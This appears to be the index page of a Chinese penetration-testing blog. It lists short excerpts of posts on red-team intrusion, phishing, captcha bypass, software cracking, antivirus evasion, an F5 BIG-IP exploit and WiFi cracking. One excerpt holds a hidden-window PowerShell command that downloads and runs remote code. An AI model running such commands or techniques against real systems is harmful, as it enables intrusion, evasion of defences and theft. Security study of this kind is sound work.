渗透测试
红队视角下的AzureAD攻防(上)
AzureAD/Azure/AD
Azure AD,是微软提供的一种基于云的身份和访问管理 (IAM) 解决方案。它可以帮助组织安全地管理员工、合作伙伴和客户对应用程序和资源的访问。
注:2023 年 6 月 21 日起,Azure AD,现在正式更名为…
记一次钓鱼邮件溯源
0X01 接到客户通知,发现疑似一份钓鱼邮件,要求进行研判并且溯源。
邮件大概如下:
0X02
压缩包更改为 EML 之后打开文件,压缩包内容如下:
PS:此处的 index.exe 初始状态为 index.sc,为了方便分析这里改掉了原始后缀。其中最主要的可执行文件为…
鉴权验证码如何绕过
0x01 在项目上遇到了一个登陆口,但是有验证码,同时使用了当前验证码的 UUID 进行鉴权,简单来说就是
如果需要爆破登录接口,需要识别验证码的同时携带上本次验证码的 UUID 同时爆破,接口才能返回信息。
样式如下:
0X02
UUID 同时有时间校验
UUID…
对一个微信小程序软件的逆向
0x01
因为最近有反编译微信小程序的需求,用了一个工具发现还不错,但是过了几天弹出了收费需求,感觉验证挺简单的。尝试破解一下。
因为运行之后在主程序上这是一个窗口,我不太懂逆向,根据我能理解的一点知识,我觉得或许能够将这个窗口给 push 掉。
0X02
看到文件夹…
CSA CCPTP认证通过分享
1 摘要 云渗透测试认证专家(Certified Cloud Penetration Test Professional, CCPTP)认证与培训项目由国际云安全联盟中华区发布,是全球首个针对云环境渗透测试能力的认证课程,旨在提供针对云计算渗透测试所需的专业实操技能…
利用Cloudflare做二级代理
1 CF 良心的一批!
访问地址:https://1.1.1.1/
2
为什么有这个想法呢,因为
能白嫖不要给钱
有些站点对 ip 限制的比较死,云厂商的 ip 偶尔是白名单,封 ip 比较快,不想被封而已。
发现 cf 给的 ip 还是比较干净的,相当舒服了。
3
详细设置步骤:…
邮件钓鱼论 之一
记录一次之前的钓鱼。 之前有个甲方开展演练,不限制攻击手法,正巧一般都是硬打进去的,这次正好写一下钓鱼。
很简单,全是基础的东西,轻喷。
0x01 为什么要钓鱼
正常来说,无论是护网还是高级渗透项目,目标肯定是做了好几轮测试的,要从外围找到点,很难。
但是在允许钓鱼的情况下…
内网第三方横向突破案例
0X01 攻击链路图 图做的比较密,单独截出几份用于说明选择和目标的方向。
关于供应商的收集
关于供应商的打击链。
关于此次供应商目标的选择。
0x02 入口
入口很简单,一个 Confluence 的漏洞,直接写入内存马。
系统存在 360 全家桶
系统是 2008…
shiro-waf-bypass
这个 shiro 是有 WAF 的,具体的情况就是找得到 key,但是找不到链。
当 key 存在但是找不到链,抓包看看请求。
我所知的 shiro bypass 思路就从 rememberMe cookie 的长度,还有就是脏数据填充,waf 会解密…
一个供应链突破案例
某护网行动,通过企查查收集到了该单位的招投标信息。 通过对该中标公司进行渗透测试,发现在其 IP 段里面存在一个 Confluence,刚好有漏洞的版本,随即拿下。
系统为 2008R2,X64
发现有 360 全家桶,权限 nt authority\network service。…
HackTheBox-Nest
HackTheBox-Nest 信息收集
Copy
└─# nmap -sV 10.129.157.43 -p 1-65535
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-20 22:27 EST
Nmap scan…
记一次从供应商到目标之旅
因涉及敏感信息较多,厚码见谅。
最近一段时间有个项目,当时对某个单位目标进行了信息收集,该系统是一个邮件系统。
目标:XXX.gov.cn 某个政务级目标
系统:自建的邮件服务系统
系统有滑块验证,因此从web爆破邮箱的作用不大,同时…
干掉卡巴斯基后台内存扫描的DLL
BypassKarpersky.zip
0x01
首先CS需要启一个powershell,
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http…
CVE-2022-1388 F5 BIG-IP未授权RCE漏洞&写Webshell
漏洞描述 漏洞描述:
在 F5 BIG-IP 16.1.x 16.1.2.2 之前的版本、15.1.5.1 之前的 15.1.x 版本、14.1.4.6 之前的
14.1.x 版本、13.1.5 之前的 13.1.x 版本以及所有 12.1.x和 11.6.x 版本…
Spring Boot Dump文件转储利用
日常测试或攻防演练中像shiro,fastjson等漏洞已经越来越少了,但是随着spring boot框架的广泛使用,spring boot带来的安全问题也越来越多,本文仅介绍未授权现在heapdump获取数据库口令,达到连接数据库的目的。其他spring…
我偷他的网
> 本文章仅作为技术学习交流,请不要随意拿邻居开刀。 提前准备
你需要如下材料
- 一个支持监听的无线网卡设备
- 一个强大的WiFi字典
- 一个有WiFi的地方
最近流量不够用了,想着偷个网试试,看了一下周边的WiFi布局。。
还是有一些WIFI设备的…
telegram session hijacking
2018年5月16日,Talos发表了关于Telegrab的一篇文章,介绍了可以劫持Telegram会话的恶意软件。原理非常简单:如果攻击者可以复制桌面用户的会话令牌(session token),那么就能劫持会话。除了本地存储的信息外,攻击者不需要其他任何信息…
Burp验证码爆破
项目地址:https://github.com/f0ng/captcha-killer-modified 识别库:
https://github.com/sml2h3/ddddocr
0x01 安装
前置条件:安装dddocr.
pip3 install ddddocr…